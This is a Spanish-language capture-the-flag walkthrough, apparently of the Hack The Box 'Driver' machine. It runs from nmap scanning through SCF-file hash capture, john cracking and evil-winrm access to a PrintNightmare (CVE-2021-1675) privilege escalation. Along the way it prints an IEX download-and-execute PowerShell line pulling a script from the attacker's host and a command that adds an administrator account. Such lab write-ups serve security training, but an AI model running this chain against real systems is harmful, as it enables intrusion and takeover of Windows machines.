nmap -A -p- -oA driver 10.129.246.138 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA driver 10.129.246.138

nmap -sU -O -p- -oA driver-udp 10.129.246.138

nikto -h 10.129.246.138:80

Pasted image 20211030110648.png

Pasted image 20211030110859.png

Vamos a http://10.129.246.138

Nos pide credenciales:

admin:admin

Pasted image 20211030110942.png

https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/

Pasted image 20211025072138.png

Pasted image 20211025072345.png

Al ver la pagina web vamos a Firmware update Center y colocamos el archivo driver.scf

Le damos click a submit.

Pasted image 20211025072719.png

Pasted image 20211030113343.png

john hash --wordlist=/usr/share/wordlists/rockyout.txt --format=netntlmv2

credenciales:

tony:liltony

Pasted image 20211030114618.png

evil-winrm -i 10.129.246.138 -u "Tony"

Pasted image 20211030130423.png

https://github.com/calebstewart/CVE-2021-1675

Hacemos un gitclone de este repositorio

Y vemos el archivo CVE-2021-1675.ps1

cd CVE-2021-1675

python3 -m http.server 80

IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.49/CVE-2021-1675.ps1')

Pasted image 20211030131536.png

Invoke-Nightmare -NewUser "cu3rv0x" -NewPassword "SuperSecure"

Pasted image 20211030132201.png

evil-winrm -i 10.129.246.138 -u "cu3rv0x"

Pasted image 20211030132557.png

cat root.txt

Pasted image 20211030132623.png

boxes

copyright©2022 Cu3rv0x all rights reserved